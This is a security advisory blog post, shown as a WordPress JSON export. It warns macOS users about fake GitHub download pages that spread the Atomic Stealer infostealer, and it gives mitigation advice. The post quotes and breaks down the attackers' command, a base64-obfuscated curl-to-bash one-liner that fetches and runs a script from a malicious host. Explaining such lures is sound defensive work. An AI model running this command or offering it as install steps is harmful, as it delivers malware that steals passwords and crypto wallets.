{"id":23245,"date":"2025-11-25T09:00:00","date_gmt":"2025-11-25T02:00:00","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=23245"},"modified":"2026-01-20T10:27:05","modified_gmt":"2026-01-20T03:27:05","slug":"fake-software-on-github-targets-mac-users","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/fake-software-on-github-targets-mac-users\/","title":{"rendered":"Warning: Fake Software on GitHub Targets Mac Users"},"content":{"rendered":"<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Recently, security experts from Malwarebytes issued a\u00a0<a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2025\/09\/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\" target=\"_blank\" rel=\"noopener nofollow\">warning<\/a>\u00a0about a widespread fake software distribution campaign happening on GitHub, targeting macOS users. The attackers have exploited the names of reputable brands to create fake download pages, spreading malware capable of stealing information.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Notably, popular software such as 1Password, Docker, Gemini, Malwarebytes, Notion, and others are among the products being impersonated, making the campaign extremely dangerous because users may unknowingly install the malicious software themselves.<\/span><\/p>\n<h3 id=\"heading-detailed-information\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Detailed Information<\/span><\/h3>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This phishing campaign uses Atomic Stealer (AMOS) \u2013 a type of malware that specializes in stealing information from Mac users. 
Notably, the attackers do not try to exploit complex vulnerabilities in the operating system; instead, they take an easier route: tricking users into installing the fake software themselves.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">To achieve this, they set up GitHub pages that look exactly like the official developer pages. Many people find it difficult to tell the real from the fake because the pages are fully built out with product information, download buttons, and even detailed installation instructions.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This campaign often starts with sponsored Google ads or SEO (Search Engine Optimization) tricks. This means that when users search for keywords like \u201cMalwarebytes Github MacOS,\u201d fake links are likely to appear at the top of the results page. Trusting the ads or top results, users click without suspecting anything.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\" data-rmiz=\"\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/698f05ba-def0-43e2-83fc-c1b3672e5af4-1762414009.jpg\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-23246\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/698f05ba-def0-43e2-83fc-c1b3672e5af4-1762414009.jpg\" alt=\"698f05ba Def0 43e2 83fc C1b3672e5af4 1762414009\" width=\"737\" height=\"466\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/698f05ba-def0-43e2-83fc-c1b3672e5af4-1762414009.jpg 737w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/698f05ba-def0-43e2-83fc-c1b3672e5af4-1762414009-700x443.jpg 700w\" sizes=\"(max-width: 737px) 100vw, 737px\" \/><\/a><\/span><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">In the case of Malwarebytes, when users access the fake GitHub page for this software, they will see a familiar button like &#8220;GET MALWAREBYTES.&#8221; By clicking 
on it, they are taken to a download page with installation instructions.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">In the instructions, the attacker often asks users to run a command in Terminal\u2014the command-line tool on macOS. At first glance, it seems like a simple command, but in reality, it downloads a script from an external server and executes it immediately. In other words, users are unwittingly opening the door for the attacker.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\" data-rmiz=\"\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/b1d339c7-09ae-4a88-9fa6-b306245239e8-1762414144.jpg\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-23247\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/b1d339c7-09ae-4a88-9fa6-b306245239e8-1762414144.jpg\" alt=\"B1d339c7 09ae 4a88 9fa6 B306245239e8 1762414144\" width=\"1001\" height=\"661\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/b1d339c7-09ae-4a88-9fa6-b306245239e8-1762414144.jpg 1001w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/b1d339c7-09ae-4a88-9fa6-b306245239e8-1762414144-700x462.jpg 700w\" sizes=\"(max-width: 1001px) 100vw, 1001px\" \/><\/a><\/span><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The image above is an example of a command used by hackers. The command can be broken down and explained as follows:<\/span><\/p>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>\/bin\/bash -c \"&lt;something&gt;\"<\/code>\u00a0runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The part in quotes uses\u00a0<code>$( ... )<\/code>. 
Everything inside is executed first; its output becomes part of the outer command.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>$(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d)<\/code>\u00a0decodes the Base64 string with the\u00a0<code>base64 -d<\/code>\u00a0command; the encoding hides the real download address from anyone glancing at the command.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>curl -fsSL<\/code>\u00a0is a command to download data from the web. The options mean:<\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>-f<\/code>: Fail silently on HTTP errors. If the server answers with an error such as 404 or 500, curl does not output the error page; it exits with a non-zero code instead, so the outer command receives nothing to execute.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>-s<\/code>: Silent mode (does not show the progress bar).<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>-S<\/code>: Show an error message if one occurs, even though\u00a0<code>-s<\/code>\u00a0is used.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>-L<\/code>: Follow redirects.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">When combining all these elements together, we get:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The inner command becomes:\u00a0<code>curl -fsSL<\/code>\u00a0<a href=\"https:\/\/gosreestr[.]com\/hun\/install.sh\" target=\"_blank\" rel=\"noopener nofollow\"><code>https:\/\/gosreestr[.]com\/hun\/install.sh<\/code><\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The outer command becomes:\u00a0<code>\/bin\/bash -c \"$(curl -fsSL<\/code>\u00a0<a 
href=\"https:\/\/gosreestr[.]com\/hun\/install.sh\" target=\"_blank\" rel=\"noopener nofollow\"><code>https:\/\/gosreestr[.]com\/hun\/install.sh<\/code><\/a><code>)\"<\/code><\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This means that the complete command instructs the system to download a script directly from an external server and immediately execute it using Bash. The scary part is that this process happens without any warnings or confirmation steps: the user never sees what the script contains and has no chance to refuse before it runs. In this way, malware can easily bypass many of the system&#8217;s usual defenses.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Once installed, Atomic Stealer can steal passwords, login information, cryptocurrency wallet data, and sensitive files. It can also install additional components to maintain long-term control of the computer.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Not only is Malwarebytes being impersonated, but other familiar software like LastPass, 1Password, Gemini, Notion, etc., is also on the list. These products are trusted by many individuals and businesses, increasing the risk of spread and the number of potential victims. And certainly, this list is not final\u2014the attacker can easily expand to other popular software.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This campaign highlights a worrying reality: users&#8217; trust in search results and code-hosting platforms like GitHub has been thoroughly exploited. 
If users rely solely on the habit of searching and clicking the first link, they can fall into a trap without realizing it.<\/span><\/p>\n<h3 id=\"heading-mitigation-amp-recommendations\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Mitigation &amp; Recommendations<\/span><\/h3>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">General users should follow these safety guidelines:<\/span><\/p>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Do not run copy-pasted commands:<\/strong>\u00a0Never copy and run commands from unverified sources, especially commands like\u00a0<code>curl \u2026 | bash<\/code>.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Use software from official sites:<\/strong>\u00a0Download software only from the developer&#8217;s official website, and verify the download link if necessary.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Avoid clicking on ad results:<\/strong>\u00a0Avoid clicking on advertised links in search results, as they may be traps set by attackers.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Use security solutions:<\/strong>\u00a0Use security software with web protection features to block fake sites from the start.<\/span><\/li>\n<\/ol>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">In case of suspicion or infection, Malwarebytes cybersecurity experts also recommend that macOS users take the following remediation steps:<\/span><\/p>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Scan the system:<\/strong>\u00a0Scan the entire system and remove suspicious LaunchAgents, LaunchDaemons, and startup items in the Library.<\/span><\/li>\n<li><span style=\"font-family: arial, 
helvetica, sans-serif;font-size: 12pt\"><strong>Reinstall the system:<\/strong>\u00a0If unusual signs persist, perform a clean reinstall of macOS and only restore data from a reliable backup.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Change passwords:<\/strong>\u00a0After reinstalling the system, users should change all passwords and enable multi-factor authentication (MFA) for important accounts.<\/span><\/li>\n<\/ol>\n<h3 id=\"heading-references\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">References<\/span><\/h3>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2025\/09\/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/www.malwarebytes.com\/blog\/news\/2025\/09\/fake-malwarebytes-lastpass-and-others-on-github-serve-malware<\/a><\/span><\/li>\n<\/ol>\n<\/div>\n<div class=\"-mt-5 mb-10\">\n<table style=\"border-collapse: collapse;width: 100%\">\n<tbody>\n<tr>\n<td style=\"width: 100%\"><p><span style=\"font-family: arial, helvetica, sans-serif\"><strong>Exclusive article by FPT IS Technology Experts<\/strong><\/span><\/p>\n<p><em style=\"font-family: arial, helvetica, sans-serif;font-size: inherit\">Nam Anh Mai D. 
\u2013 FPT IS Cyber Security Center<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n","protected":false},"author":21,"featured_media":23248,"parent":0,"template":"","nang_luc":[790,821],"danh_muc_goc_nhin_so":[789],"dich_vu":[712],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-23245","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry","nang_luc-experts-sharing","nang_luc-security","danh_muc_goc_nhin_so-expert-sharing","dich_vu-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/23245","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/23248"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=23245"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=23245"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=23245"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=23245"},{"taxonomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=23245"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=23245"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/san_pham?post=23245"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=23245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}
","templated":true}]}}